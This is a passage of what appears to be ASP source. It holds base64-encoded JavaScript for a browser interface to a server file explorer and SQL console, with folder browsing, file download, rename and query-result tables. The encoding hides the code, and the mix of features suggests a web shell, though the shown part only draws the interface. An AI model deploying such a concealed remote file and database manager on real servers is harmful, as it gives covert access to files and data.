+"d2luZG93V2lkdGggPSBkb2N1bWVudC5ib2R5LmNsaWVudFdpZHRoOwoJCXdpbmRvd0hlaWdodCA9IGRvY3VtZW50LmJvZHkuY2xpZW50SGVpZ2h0OwoJfQoKCS8vIGZvciBzbWFsbCBwYWdlcyB3aXRoIHRvdGFsIGhlaWdodCBsZXNzIHRoZW4gaGVpZ2h0IG9mIHRoZSB2aWV3cG9ydAoJaWYoeVNjcm9sbCA8IHdpbmRvd0hlaWdo" &_
+"dCl7CgkJcGFnZUhlaWdodCA9IHdpbmRvd0hlaWdodDsKCX0gZWxzZSB7CgkJcGFnZUhlaWdodCA9IHlTY3JvbGw7Cgl9CgoJLy8gZm9yIHNtYWxsIHBhZ2VzIHdpdGggdG90YWwgd2lkdGggbGVzcyB0aGVuIHdpZHRoIG9mIHRoZSB2aWV3cG9ydAoJaWYoeFNjcm9sbCA8IHdpbmRvd1dpZHRoKXsKCQlwYWdlV2lkdGggPSB4U2Ny" &_
+"b2xsOwoJfSBlbHNlIHsKCQlwYWdlV2lkdGggPSB3aW5kb3dXaWR0aDsKCX0KCglyZXR1cm4gW3BhZ2VXaWR0aCxwYWdlSGVpZ2h0XTsKfQoKZnVuY3Rpb24gdXJsQ2hlY2soKQp7Cgl1cmw9d2luZG93LmxvY2F0aW9uLmhyZWY7CglpZiAodXJsICE9ICcnICYmIHVybCE9bGFzdFVybCkKCXsKCQlpZighY3VycmVudF9ydW5uaW5n" &_
+"KXsKCQkJbG9hZFBhZ2UoKTsKCQkJbGFzdFVybD11cmw7CgkJfWVsc2V7CgkJCWFsZXJ0KCJMZXQgdGhlIGN1cnJlbnRseSBydW5uaW5nIHRhc2sgZmluaXNoIGZpcnN0ICEiKTsKCQkJd2luZG93LmxvY2F0aW9uLmhyZWYgPSBsYXN0VXJsOwoJCX0KCX0KfQoKZnVuY3Rpb24gc3RhcnRMb2FkKCkgewoJaW1nX2xvYWRpbmcgPSAg" &_
+"bmV3IEltYWdlKCk7CglpbWdfbG9hZGluZy5zcmM9Ij9tb2RlPWltYWdlJmltZ0lkPWxvYWRpbmciOwoJLy9hZGRFdmVudChkb2N1bWVudCwgImtleWRvd24iLCBrZXlDYXB0dXJlLCB0cnVlKTsKCWludGVydmFsID0gc2V0SW50ZXJ2YWwoJ3VybENoZWNrKCknLDEwMCk7Cn0KCgpmdW5jdGlvbiBhZGRUUihpZCwgeHR5cGUsIGNz" &_
+"c0NsYXNzKSB7CiAgdmFyIG5ld1RSID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnVFInKTsKICBuZXdUUi5zZXRBdHRyaWJ1dGUoJ2lkJyx4dHlwZSsnJytpZCk7CiAgaWYoY3NzQ2xhc3MpCgluZXdUUi5zZXRBdHRyaWJ1dGUoKGlzSUUgPyAnY2xhc3NOYW1lJyA6ICdjbGFzcycpLCBjc3NDbGFzcyk7CnJldHVybiBuZXdUUjsK" &_
+"fQoKZnVuY3Rpb24gYWRkVEQodGV4dCwgY3NzQ2xhc3MsIHdpZHRoLCBhbGlnbikgewogIHZhciBuZXdURCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ1REJyk7CiAgbmV3VEQuaW5uZXJIVE1MID0gdGV4dDsKICBpZihjc3NDbGFzcykKCW5ld1RELnNldEF0dHJpYnV0ZSgoaXNJRSA/ICdjbGFzc05hbWUnIDogJ2NsYXNzJyks" &_
+"IGNzc0NsYXNzKTsKICBpZih3aWR0aCkKCW5ld1RELnNldEF0dHJpYnV0ZSgnd2lkdGgnLHdpZHRoKTsKICBpZihhbGlnbikKCW5ld1RELnNldEF0dHJpYnV0ZSgnYWxpZ24nLGFsaWduKTsKcmV0dXJuIG5ld1REOwp9CgpmdW5jdGlvbiBhZGRUQk9EWShpZCkgewogIHZhciBuZXdUQk9EWSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1l" &_
+"bnQoJ1RCT0RZJyk7CiAgaWYoaWQpCgluZXdUQk9EWS5zZXRBdHRyaWJ1dGUoJ2lkJywgaWQpOwpyZXR1cm4gbmV3VEJPRFk7Cn0KCmZ1bmN0aW9uIGFkZFRIRUFEKGlkKSB7CiAgdmFyIG5ld1RIRUFEID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnVEhFQUQnKTsKICBpZihpZCkKCW5ld1RIRUFELnNldEF0dHJpYnV0ZSgnaWQn" &_
+"LCBpZCk7CnJldHVybiBuZXdUSEVBRDsKfQoKZnVuY3Rpb24gYWRkTGluayh0ZXh0LCBocmVmLCBjc3NDbGFzcykgewogIHZhciBuZXdMaW5rID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnQScpOwogIG5ld0xpbmsuaW5uZXJIVE1MID0gdGV4dDsKICBpZihocmVmKQoJbmV3TGluay5zZXRBdHRyaWJ1dGUoJ2hyZWYnLCBocmVm" &_
+"KTsKICBpZihjc3NDbGFzcykKCW5ld0xpbmsuc2V0QXR0cmlidXRlKChpc0lFID8gJ2NsYXNzTmFtZScgOiAnY2xhc3MnKSwgY3NzQ2xhc3MpOwpyZXR1cm4gbmV3TGluazsKfQoKZnVuY3Rpb24gZGlzcGxheVNRTENvbnRlbnQoc3FsUmVzdWx0KQp7Cgl3aGlsZShnZXRJZCgic3FsQ29udGVudCIpLmhhc0NoaWxkTm9kZXMoKSkK" &_
+"CXsKCQlnZXRJZCgic3FsQ29udGVudCIpLnJlbW92ZUNoaWxkKGdldElkKCJzcWxDb250ZW50IikuZmlyc3RDaGlsZCk7Cgl9CgoJaWYoc3FsUmVzdWx0LmFjdGlvbi5oZWFkZXIubGVuZ3RoID4gMCl7CgkJZ2V0SWQoImFmZmVjdGVkIikuaW5uZXJIVE1MID0gc3FsUmVzdWx0LmFjdGlvbi5kYXRhLmxlbmd0aDsKCQlnZXRJZCgi" &_
+"bHN0QWZmIikuaW5uZXJIVE1MID0gImxpc3RlZCI7Cgl9ZWxzZXsKCQlnZXRJZCgiYWZmZWN0ZWQiKS5pbm5lckhUTUwgPSBzcWxSZXN1bHQuYWN0aW9uLmFmZmVjdGVkOwoJCWdldElkKCJsc3RBZmYiKS5pbm5lckhUTUwgPSAiYWZmZWN0ZWQiOwoJfQoKCWlmKHNxbFJlc3VsdC5hY3Rpb24uaGVhZGVyICYmIHNxbFJlc3VsdC5h" &_
+"Y3Rpb24uaGVhZGVyLmxlbmd0aCA+IDApewoJCW5ld0hlYWQgPSBhZGRUSEVBRCgpOwoJCW5ld1JvdyA9IGFkZFRSKDAsICJzcWxIZWFkIik7CgkJZm9yIChpPTA7aTxzcWxSZXN1bHQuYWN0aW9uLmhlYWRlci5sZW5ndGg7aSsrKQoJCXsKCQkJbmV3Q29sID0gYWRkVEQoc3FsUmVzdWx0LmFjdGlvbi5oZWFkZXJbaV0sICJ0YWJs" &_
+"ZUhlYWQiKTsKCQkJbmV3Um93LmFwcGVuZENoaWxkKG5ld0NvbCk7CgkJfQoJCW5ld0hlYWQuYXBwZW5kQ2hpbGQobmV3Um93KTsKCQlnZXRJZCgic3FsQ29udGVudCIpLmFwcGVuZENoaWxkKG5ld0hlYWQpOwoKCQluZXdUYm9keSA9IGFkZFRCT0RZKCJyb3dDb250ZW50Iik7CgkJZm9yIChpPTA7aTxzcWxSZXN1bHQuYWN0aW9u" &_
+"LmRhdGEubGVuZ3RoO2krKykKCQl7CgkJCW5ld1JvdyA9IGFkZFRSKGksICJzcWxSb3ciKTsKCQkJCWZvciAoaj0wO2o8c3FsUmVzdWx0LmFjdGlvbi5kYXRhW2ldLmxlbmd0aDtqKyspCgkJCQl7CgkJCQkJbmV3Q29sID0gYWRkVEQoc3FsUmVzdWx0LmFjdGlvbi5kYXRhW2ldW2pdLCAia2JydG0iKTsKCQkJCQluZXdSb3cuYXBw" &_
+"ZW5kQ2hpbGQobmV3Q29sKTsKCQkJCX0KCQkJbmV3VGJvZHkuYXBwZW5kQ2hpbGQobmV3Um93KTsKCQl9CgkJZ2V0SWQoInNxbENvbnRlbnQiKS5hcHBlbmRDaGlsZChuZXdUYm9keSk7Cgl9Cn0KCmZ1bmN0aW9uIGRpc3BsYXlDb250ZW50KGZvbGRlck5ldywgZmlsZU5ldykKewoJaWYoIWZmTGlzdCkKCXsKCQlyZXR1cm47Cgl9" &_
+"CgoJaWYoZmZMaXN0LmZvbGRlcnMubGVuZ3RoIC0gZm9sZGVyTmV3ID09IDAgJiYgZmZMaXN0LmZpbGVzLmxlbmd0aCAtIGZpbGVOZXcgPT0gMCl7CgkJY2xlYXJDb250ZW50KCk7CgoJCXZhciBuZXd0YmxMaXN0ID0gYWRkVEJPRFkoJ3RibExpc3QnKTsKCQlnZXRJZCgidGJsQ29udGVudCIpLmluc2VydEJlZm9yZShuZXd0YmxM" &_
+"aXN0LCBnZXRJZCgidGJsQ29tbWFuZCIpKTsKCgkJbGV2ZWxSb290ID0gZmZMaXN0LmluZm8ucGF0aC5zcGxpdCgiXFwiKTsKCQlsZXZlbFJvb3QgPSBsZXZlbFJvb3RbMF07CgoJCWxldmVsVXAgPSBmZkxpc3QuaW5mby5wYXRoLnNwbGl0KCJcXCIpOwoJCWxldmVsVXAgPSBmZkxpc3QuaW5mby5wYXRoLnJlcGxhY2UobGV2ZWxV" &_
+"cFtsZXZlbFVwLmxlbmd0aC0yXSsiXFwiLCAiIik7CgoJCWlmKGxldmVsVXAgPT0gIiIgfHwgbGV2ZWxVcCA9PSBudWxsKQoJCQlsZXZlbFVwID0gbGV2ZWxSb290KyJcXCI7CgoJCQluZXdSb3cgPSBhZGRUUigwLCAicm9vdCIpOwoJCQluZXdMaW5rID0gYWRkTGluaygiW1Jvb3RdIFxcIiwgIiIrZmZMaXN0LmluZm8uZmlsZXBh" &_
+"dGgrIiNFeHBsb3JlcnwiK2xldmVsUm9vdCsiXFwiKTsKCQkJbmV3Q29sID0gYWRkVEQoIiZuYnNwOyZuYnNwOzxpbWcgc3JjPSc/bW9kZT1pbWFnZSZpbWdJZD1kaXInPiIsICJrYnJ0bSIpOwoJCQluZXdDb2wuYXBwZW5kQ2hpbGQobmV3TGluayk7CgkJCW5ld1Jvdy5hcHBlbmRDaGlsZChuZXdDb2wpOwoJCQluZXdSb3cuYXBw" &_
+"ZW5kQ2hpbGQoYWRkVEQoIiZuYnNwOyIsICJrYnJ0bSIpKTsKCQkJbmV3Um93LmFwcGVuZENoaWxkKGFkZFREKCJESVIiLCAia2JydG0iLCAiIiwgImNlbnRlciIpKTsKCQkJbmV3Um93LmFwcGVuZENoaWxkKGFkZFREKCImbmJzcDsiLCAia2JydG0iKSk7CgkJCW5ld1Jvdy5hcHBlbmRDaGlsZChhZGRURCgiJm5ic3A7IiwgImti" &_
+"cnRtIikpOwoJCQluZXdSb3cuYXBwZW5kQ2hpbGQoYWRkVEQoIiZuYnNwOyIsICJrYnJ0bSIpKTsKCQkJbmV3Um93LmFwcGVuZENoaWxkKGFkZFREKCImbmJzcDsiLCAia2JydG0iKSk7CgkJCW5ld1Jvdy5hcHBlbmRDaGlsZChhZGRURCgiJm5ic3A7IiwgImticnRtIikpOwoJCQlnZXRJZCgidGJsTGlzdCIpLmFwcGVuZENoaWxk" &_
+"KG5ld1Jvdyk7CgoJCQluZXdSb3cgPSBhZGRUUigwLCAidXAiKTsKCQkJbmV3TGluayA9IGFkZExpbmsoIltVcF0gLi4iLCAiIitmZkxpc3QuaW5mby5maWxlcGF0aCsiI0V4cGxvcmVyfCIrbGV2ZWxVcCk7CgkJCW5ld0NvbCA9IGFkZFREKCImbmJzcDsmbmJzcDs8aW1nIHNyYz0nP21vZGU9aW1hZ2UmaW1nSWQ9bHZ1cCc+Iiwg" &_
+"ImticnRtIik7CgkJCW5ld0NvbC5hcHBlbmRDaGlsZChuZXdMaW5rKTsKCQkJbmV3Um93LmFwcGVuZENoaWxkKG5ld0NvbCk7CgkJCW5ld1Jvdy5hcHBlbmRDaGlsZChhZGRURCgiJm5ic3A7IiwgImticnRtIikpOwoJCQluZXdSb3cuYXBwZW5kQ2hpbGQoYWRkVEQoIkRJUiIsICJrYnJ0bSIsICIiLCAiY2VudGVyIikpOwoJCQlu" &_
+"ZXdSb3cuYXBwZW5kQ2hpbGQoYWRkVEQoIiZuYnNwOyIsICJrYnJ0bSIpKTsKCQkJbmV3Um93LmFwcGVuZENoaWxkKGFkZFREKCImbmJzcDsiLCAia2JydG0iKSk7CgkJCW5ld1Jvdy5hcHBlbmRDaGlsZChhZGRURCgiJm5ic3A7IiwgImticnRtIikpOwoJCQluZXdSb3cuYXBwZW5kQ2hpbGQoYWRkVEQoIiZuYnNwOyIsICJrYnJ0" &_
+"bSIpKTsKCQkJbmV3Um93LmFwcGVuZENoaWxkKGFkZFREKCImbmJzcDsiLCAia2JydG0iKSk7CgkJCWdldElkKCJ0YmxMaXN0IikuYXBwZW5kQ2hpbGQobmV3Um93KTsKCgkJCW5ld1JvdyA9IGFkZFRSKDAsICJnYXAiKTsKCQkJbmV3Um93LmFwcGVuZENoaWxkKGFkZFREKCImbmJzcDsiLCAia2JydG0iKSk7CgkJCW5ld1Jvdy5h" &_
+"cHBlbmRDaGlsZChhZGRURCgiJm5ic3A7IiwgImticnRtIikpOwoJCQluZXdSb3cuYXBwZW5kQ2hpbGQoYWRkVEQoIiZuYnNwOyIsICJrYnJ0bSIpKTsKCQkJbmV3Um93LmFwcGVuZENoaWxkKGFkZFREKCImbmJzcDsiLCAia2JydG0iKSk7CgkJCW5ld1Jvdy5hcHBlbmRDaGlsZChhZGRURCgiJm5ic3A7IiwgImticnRtIikpOwoJ" &_
+"CQluZXdSb3cuYXBwZW5kQ2hpbGQoYWRkVEQoIiZuYnNwOyIsICJrYnJ0bSIpKTsKCQkJbmV3Um93LmFwcGVuZENoaWxkKGFkZFREKCImbmJzcDsiLCAia2JydG0iKSk7CgkJCW5ld1Jvdy5hcHBlbmRDaGlsZChhZGRURCgiJm5ic3A7IiwgImticnRtIikpOwoJCQlnZXRJZCgidGJsTGlzdCIpLmFwcGVuZENoaWxkKG5ld1Jvdyk7" &_
+"Cgl9CgoJaWYoZmZMaXN0LmZvbGRlcnMpewoJCXNldEl0ZW1zQ291bnQoKTsKCQlmb3IgKGk9ZmZMaXN0LmZvbGRlcnMubGVuZ3RoIC0gZm9sZGVyTmV3O2k8ZmZMaXN0LmZvbGRlcnMubGVuZ3RoO2krKykKCQl7CgkJCWdldElkKCJ0YmxMaXN0IikuaW5zZXJ0QmVmb3JlKGFkZEZvbGRlclJvdyhpKSwgZ2V0SWQoImdhcDAiKSk7" &_
+"CgkJfQoJfWVsc2V7CgkJZ2V0SWQoImZvbGRlck5vIikuaW5uZXJIVE1MID0gIjAiOwoJfQoKCWlmKGZmTGlzdC5maWxlcyl7CgkJc2V0SXRlbXNDb3VudCgpOwoJCWZvciAoaT1mZkxpc3QuZmlsZXMubGVuZ3RoIC0gZmlsZU5ldztpPGZmTGlzdC5maWxlcy5sZW5ndGg7aSsrKQoJCXsKCQkJZ2V0SWQoInRibExpc3QiKS5pbnNl" &_
+"cnRCZWZvcmUoYWRkRmlsZVJvdyhpKSwgZ2V0SWQoInRibExpc3QiKS5sYXN0Q2hpbGQubmV4dFNpYmxpbmcpOwoJCX0KCX1lbHNlewoJCWdldElkKCJmaWxlTm8iKS5pbm5lckhUTUwgPSAiMCI7Cgl9Cn0KCmZ1bmN0aW9uIGFkZEZvbGRlclJvdyhpZCkgewoJCQluZXdSb3cgPSBhZGRUUihpZCwgImZvbGRlciIpOwoKCQkJbmV3" &_
+"TGluayA9IGFkZExpbmsoZmZMaXN0LmZvbGRlcnNbaWRdLnNwbGl0KCJ8IilbMF0sICIiK2ZmTGlzdC5pbmZvLmZpbGVwYXRoKyIjRXhwbG9yZXJ8IitmZkxpc3QuaW5mby5wYXRoKyIiK2ZmTGlzdC5mb2xkZXJzW2lkXS5zcGxpdCgifCIpWzBdKyJcXCIpOwoJCQluZXdDb2wgPSBhZGRURCgiJm5ic3A7Jm5ic3A7PGltZyBzcmM9" &_
+"Jz9tb2RlPWltYWdlJmltZ0lkPWRpcic+IiwgImticnRtIik7CgkJCWFkZEV2ZW50KG5ld0NvbCwgImNsaWNrIiwgY2hlY2tib3hNYW5hZ2VFdmVudCwgdHJ1ZSk7CgkJCWFkZEV2ZW50KG5ld0NvbCwgImRibGNsaWNrIiwgY2hlY2tib3hNYW5hZ2VFdmVudERCTCwgdHJ1ZSk7CgkJCW5ld0NvbC5hcHBlbmRDaGlsZChuZXdMaW5r" &_
+"KTsKCgkJCW5ld1Jvdy5hcHBlbmRDaGlsZChuZXdDb2wpOwoJCQluZXdDb2wgPSBhZGRURCgiJm5ic3A7IiwgImticnRtIik7CgkJCWFkZEV2ZW50KG5ld0NvbCwgImNsaWNrIiwgY2hlY2tib3hNYW5hZ2VFdmVudCwgdHJ1ZSk7CgkJCW5ld1Jvdy5hcHBlbmRDaGlsZChuZXdDb2wpOwoJCQluZXdDb2wgPSBhZGRURCgiRElSIiwg" &_
+"ImticnRtIiwgIiIsICJjZW50ZXIiKTsKCQkJYWRkRXZlbnQobmV3Q29sLCAiY2xpY2siLCBjaGVja2JveE1hbmFnZUV2ZW50LCB0cnVlKTsKCQkJbmV3Um93LmFwcGVuZENoaWxkKG5ld0NvbCk7CgkJCW5ld0NvbCA9IGFkZFREKGZmTGlzdC5mb2xkZXJzW2lkXS5zcGxpdCgifCIpWzFdLCAia2JydG0iLCAiIiwgImNlbnRlciIp" &_
+"OwoJCQlhZGRFdmVudChuZXdDb2wsICJjbGljayIsIGNoZWNrYm94TWFuYWdlRXZlbnQsIHRydWUpOwoJCQluZXdSb3cuYXBwZW5kQ2hpbGQobmV3Q29sKTsKCQkJbmV3Q29sID0gYWRkVEQoZmZMaXN0LmZvbGRlcnNbaWRdLnNwbGl0KCJ8IilbMl0sICJrYnJ0bSIsICIiLCAiY2VudGVyIik7CgkJCWFkZEV2ZW50KG5ld0NvbCwg" &_
+"ImNsaWNrIiwgY2hlY2tib3hNYW5hZ2VFdmVudCwgdHJ1ZSk7CgkJCW5ld1Jvdy5hcHBlbmRDaGlsZChuZXdDb2wpOwoJCQluZXdDb2wgPSBhZGRURCgiPGlucHV0IHR5cGU9J2NoZWNrYm94JyBjbGFzcz0neGNoZWNrJyBuYW1lPSdkeCcgb25DbGljaz0nY2hlY2tib3hNYW5hZ2UodGhpcyk7JyB2YWx1ZT0nIitpZCsiJz4iLCAi" &_
+"a2JydG0gZmNoZWNrIiwgIiIsICJjZW50ZXIiKTsKCQkJYWRkRXZlbnQobmV3Q29sLCAiY2xpY2siLCBjaGVja2JveE1hbmFnZUV2ZW50LCB0cnVlKTsKCQkJbmV3Um93LmFwcGVuZENoaWxkKG5ld0NvbCk7CgkJCW5ld1Jvdy5hcHBlbmRDaGlsZChhZGRURCgiJm5ic3A7IiwgImticnRtIGZjb21tYW5kIiwgIiIsICJjZW50ZXIi" &_
+"KSk7CgkJCW5ld1Jvdy5hcHBlbmRDaGlsZChhZGRURCgiPEEgaHJlZj1cImphdmFzY3JpcHQ6cmVuYW1lRm9sZGVyKCIraWQrIik7XCI+W1JlbmFtZV08L0E+IiwgImticnRtIGZjb21tYW5kIiwgIiIsICJjZW50ZXIiKSk7CgoJCQlyZXR1cm4gbmV3Um93Owp9CgpmdW5jdGlvbiBhZGRGaWxlUm93KGlkKSB7CgkJbmV3Um93ID0g" &_
+"YWRkVFIoaWQsICJmaWxlIik7CgoJCW5ld0NvbCA9IGFkZFREKGNyZWF0SW1hZ2UoZmZMaXN0LmZpbGVzW2lkXS5zcGxpdCgifCIpWzBdKSwgImticnRtIik7CgkJYWRkRXZlbnQobmV3Q29sLCAiY2xpY2siLCBjaGVja2JveE1hbmFnZUV2ZW50LCB0cnVlKTsKCQlhZGRFdmVudChuZXdDb2wsICJkYmxjbGljayIsIGNoZWNrYm94" &_
+"TWFuYWdlRXZlbnREQkwsIHRydWUpOwoJCW5ld1Jvdy5hcHBlbmRDaGlsZChuZXdDb2wpOwoKCQluZXdDb2wgPSBhZGRURCgiWzxmb250IGNvbG9yPXllbGxvdz4iK2ZmTGlzdC5maWxlc1tpZF0uc3BsaXQoInwiKVsxXSsiPC9mb250Pl0iLCAia2JydG0iLCAiIiwgImNlbnRlciIpOwoJCWFkZEV2ZW50KG5ld0NvbCwgImNsaWNr" &_
+"IiwgY2hlY2tib3hNYW5hZ2VFdmVudCwgdHJ1ZSk7CgkJbmV3Um93LmFwcGVuZENoaWxkKG5ld0NvbCk7CgoJCW5ld0NvbCA9IGFkZFREKGZmTGlzdC5maWxlc1tpZF0uc3BsaXQoInwiKVsyXSwgImticnRtIiwgIiIsICJjZW50ZXIiKTsKCQlhZGRFdmVudChuZXdDb2wsICJjbGljayIsIGNoZWNrYm94TWFuYWdlRXZlbnQsIHRy" &_
+"dWUpOwoJCW5ld1Jvdy5hcHBlbmRDaGlsZChuZXdDb2wpOwoKCQluZXdDb2wgPSBhZGRURChmZkxpc3QuZmlsZXNbaWRdLnNwbGl0KCJ8IilbM10sICJrYnJ0bSIsICIiLCAiY2VudGVyIik7CgkJYWRkRXZlbnQobmV3Q29sLCAiY2xpY2siLCBjaGVja2JveE1hbmFnZUV2ZW50LCB0cnVlKTsKCQluZXdSb3cuYXBwZW5kQ2hpbGQo" &_
+"bmV3Q29sKTsKCgkJbmV3Q29sID0gYWRkVEQoZmZMaXN0LmZpbGVzW2lkXS5zcGxpdCgifCIpWzRdLCAia2JydG0iLCAiIiwgICJjZW50ZXIiKTsKCQlhZGRFdmVudChuZXdDb2wsICJjbGljayIsIGNoZWNrYm94TWFuYWdlRXZlbnQsIHRydWUpOwoJCW5ld1Jvdy5hcHBlbmRDaGlsZChuZXdDb2wpOwoKCQluZXdDb2wgPSBhZGRU" &_
+"RCgiPGlucHV0IHR5cGU9J2NoZWNrYm94JyBjbGFzcz0neGNoZWNrJyBuYW1lPSdmeCcgb25DbGljaz0nY2hlY2tib3hNYW5hZ2UodGhpcyk7JyB2YWx1ZT0nIitpZCsiJz4iLCAia2JydG0gZmNoZWNrIiwgIiIsICJjZW50ZXIiKTsKCQlhZGRFdmVudChuZXdDb2wsICJjbGljayIsIGNoZWNrYm94TWFuYWdlRXZlbnQsIHRydWUp" &_
+"OwoJCW5ld1Jvdy5hcHBlbmRDaGlsZChuZXdDb2wpOwoKCQluZXdDb2wgPSBhZGRURCgiPEEgaHJlZj0nP21vZGU9ZG93bmxvYWQmbG9jYXRpb249IiArIGZmTGlzdC5pbmZvLnBhdGggKyAiJmZpbGU9IitmZkxpc3QuZmlsZXNbaWRdLnNwbGl0KCJ8IilbMF0rIic+W0Rvd25sb2FkXTwvQT4iLCAia2JydG0gZmNvbW1hbmQiLCAi" &_
+"IiwgImNlbnRlciIpOwoJCW5ld1Jvdy5hcHBlbmRDaGlsZChuZXdDb2wpOwoKCQluZXdSb3cuYXBwZW5kQ2hpbGQoYWRkVEQoIjxBIGhyZWY9XCJqYXZhc2NyaXB0OnJlbmFtZUZpbGUoIitpZCsiKTtcIj5bUmVuYW1lXTwvQT4iLCAia2JydG0gZmNvbW1hbmQiLCAiIiwgImNlbnRlciIpKTsKCgkJcmV0dXJuIG5ld1JvdzsKfQoK" &_
+"ZnVuY3Rpb24gQ2hlY2tOYW1lKHN0cikgewoJdmFyIHJlOwoJcmUgPSAvW1xcLzoqPyI8PnxdL2dpOwoJaWYgKHJlLnRlc3Qoc3RyKSkgcmV0dXJuIGZhbHNlOwoJZWxzZSByZXR1cm4gdHJ1ZTsKfQoKZnVuY3Rpb24gY2hlY2tib3hNYW5hZ2VFdmVudERCTChlKQp7CglpZiAoIWUpIHZhciBlID0gd2luZG93LmV2ZW50OwoJaWQg" &_
+"PSBlLnRhcmdldCB8fCBlLnNyY0VsZW1lbnQ7CglpZiAoaWQubm9kZVR5cGUgPT0gMykgaWQgPSBpZC5wYXJlbnROb2RlOwoKCWlmKGlkLnRhZ05hbWUudG9Mb3dlckNhc2UoKSA9PSAiYSIgfHwgaWQudGFnTmFtZS50b0xvd2VyQ2FzZSgpID09ICJpbnB1dCIpCgl7CgkJcmV0dXJuOwoJfQoKCXdoaWxlIChpZC5wYXJlbnROb2Rl" &_
+"LnRhZ05hbWUudG9Mb3dlckNhc2UoKSAhPSAidHIiKQoJewoJCWlkID0gaWQucGFyZW50Tm9kZTsKCX0KCglpZihpZC5wYXJlbnROb2RlLmNoaWxkTm9kZXNbMl0uaW5uZXJIVE1MID09ICJESVIiKXsKCQlpZC5wYXJlbnROb2RlLmNoaWxkTm9kZXNbMF0uc2V0QXR0cmlidXRlKChpc0lFID8gJ2NsYXNzTmFtZScgOiAnY2xhc3Mn" &_
+"KSwgJ2ticnRtJyk7CgkJaWQucGFyZW50Tm9kZS5jaGlsZE5vZGVzWzNdLnNldEF0dHJpYnV0ZSgoaXNJRSA/ICdjbGFzc05hbWUnIDogJ2NsYXNzJyksICdrYnJ0bScpOwoJCWlkLnBhcmVudE5vZGUuY2hpbGROb2Rlc1s0XS5zZXRBdHRyaWJ1dGUoKGlzSUUgPyAnY2xhc3NOYW1lJyA6ICdjbGFzcycpLCAna2JydG0nKTsKCQlp" &_
+"ZC5wYXJlbnROb2RlLmNoaWxkTm9kZXNbNV0uc2V0QXR0cmlidXRlKChpc0lFID8gJ2NsYXNzTmFtZScgOiAnY2xhc3MnKSwgJ2ticnRtJyk7CgkJaWQucGFyZW50Tm9kZS5jaGlsZE5vZGVzWzVdLmZpcnN0Q2hpbGQuY2hlY2tlZCA9IGZhbHNlOwoJCXJlbmFtZUZvbGRlcihpZC5wYXJlbnROb2RlLmNoaWxkTm9kZXNbNV0uZmly" &_
+"c3RDaGlsZC52YWx1ZSk7Cgl9ZWxzZXsKCQlpZC5wYXJlbnROb2RlLmNoaWxkTm9kZXNbMF0uc2V0QXR0cmlidXRlKChpc0lFID8gJ2NsYXNzTmFtZScgOiAnY2xhc3MnKSwgJ2ticnRtJyk7CgkJaWQucGFyZW50Tm9kZS5jaGlsZE5vZGVzWzNdLnNldEF0dHJpYnV0ZSgoaXNJRSA/ICdjbGFzc05hbWUnIDogJ2NsYXNzJyksICdr" &_
+"YnJ0bScpOwoJCWlkLnBhcmVudE5vZGUuY2hpbGROb2Rlc1s0XS5zZXRBdHRyaWJ1dGUoKGlzSUUgPyAnY2xhc3NOYW1lJyA6ICdjbGFzcycpLCAna2JydG0nKTsKCQlpZC5wYXJlbnROb2RlLmNoaWxkTm9kZXNbNV0uc2V0QXR0cmlidXRlKChpc0lFID8gJ2NsYXNzTmFtZScgOiAnY2xhc3MnKSwgJ2ticnRtJyk7CgkJaWQucGFy" &_
+"ZW50Tm9kZS5jaGlsZE5vZGVzWzVdLmZpcnN0Q2hpbGQuY2hlY2tlZCA9IGZhbHNlOwoJCXJlbmFtZUZpbGUoaWQucGFyZW50Tm9kZS5jaGlsZE5vZGVzWzVdLmZpcnN0Q2hpbGQudmFsdWUpOwoJfQp9CgpmdW5jdGlvbiBjaGVja2JveE1hbmFnZUV2ZW50KGUpCnsKCWlmICghZSkgdmFyIGUgPSB3aW5kb3cuZXZlbnQ7CglpZCA9" &_
+"IGUudGFyZ2V0IHx8IGUuc3JjRWxlbWVudDsKCWlmIChpZC5ub2RlVHlwZSA9PSAzKSBpZCA9IGlkLnBhcmVudE5vZGU7CgoJaWYoaWQudGFnTmFtZS50b0xvd2VyQ2FzZSgpID09ICJhIiB8fCBpZC50YWdOYW1lLnRvTG93ZXJDYXNlKCkgPT0gImlucHV0IikKCXsKCQlyZXR1cm47Cgl9CgoJd2hpbGUgKGlkLnBhcmVudE5vZGUu" &_
+"dGFnTmFtZS50b0xvd2VyQ2FzZSgpICE9ICJ0ciIpCgl7CgkJaWQgPSBpZC5wYXJlbnROb2RlOwoJfQoKCWlmKGlkLnBhcmVudE5vZGUuY2hpbGROb2Rlc1s1XS5maXJzdENoaWxkLmNoZWNrZWQpewoJCWlkLnBhcmVudE5vZGUuY2hpbGROb2Rlc1swXS5zZXRBdHRyaWJ1dGUoKGlzSUUgPyAnY2xhc3NOYW1lJyA6ICdjbGFzcycp" &_
+"LCAna2JydG0nKTsKCQlpZC5wYXJlbnROb2RlLmNoaWxkTm9kZXNbM10uc2V0QXR0cmlidXRlKChpc0lFID8gJ2NsYXNzTmFtZScgOiAnY2xhc3MnKSwgJ2ticnRtJyk7CgkJaWQucGFyZW50Tm9kZS5jaGlsZE5vZGVzWzRdLnNldEF0dHJpYnV0ZSgoaXNJRSA/ICdjbGFzc05hbWUnIDogJ2NsYXNzJyksICdrYnJ0bScpOwoJCWlk" &_
+"LnBhcmVudE5vZGUuY2hpbGROb2Rlc1s1XS5zZXRBdHRyaWJ1dGUoKGlzSUUgPyAnY2xhc3NOYW1lJyA6ICdjbGFzcycpLCAna2JydG0nKTsKCQlpZC5wYXJlbnROb2RlLmNoaWxkTm9kZXNbNV0uZmlyc3RDaGlsZC5jaGVja2VkID0gZmFsc2U7Cgl9ZWxzZXsKCQlpZC5wYXJlbnROb2RlLmNoaWxkTm9kZXNbMF0uc2V0QXR0cmli" &_
+"dXRlKChpc0lFID8gJ2NsYXNzTmFtZScgOiAnY2xhc3MnKSwgJycpOwoJCWlkLnBhcmVudE5vZGUuY2hpbGROb2Rlc1szXS5zZXRBdHRyaWJ1dGUoKGlzSUUgPyAnY2xhc3NOYW1lJyA6ICdjbGFzcycpLCAnJyk7CgkJaWQucGFyZW50Tm9kZS5jaGlsZE5vZGVzWzRdLnNldEF0dHJpYnV0ZSgoaXNJRSA/ICdjbGFzc05hbWUnIDog" &_
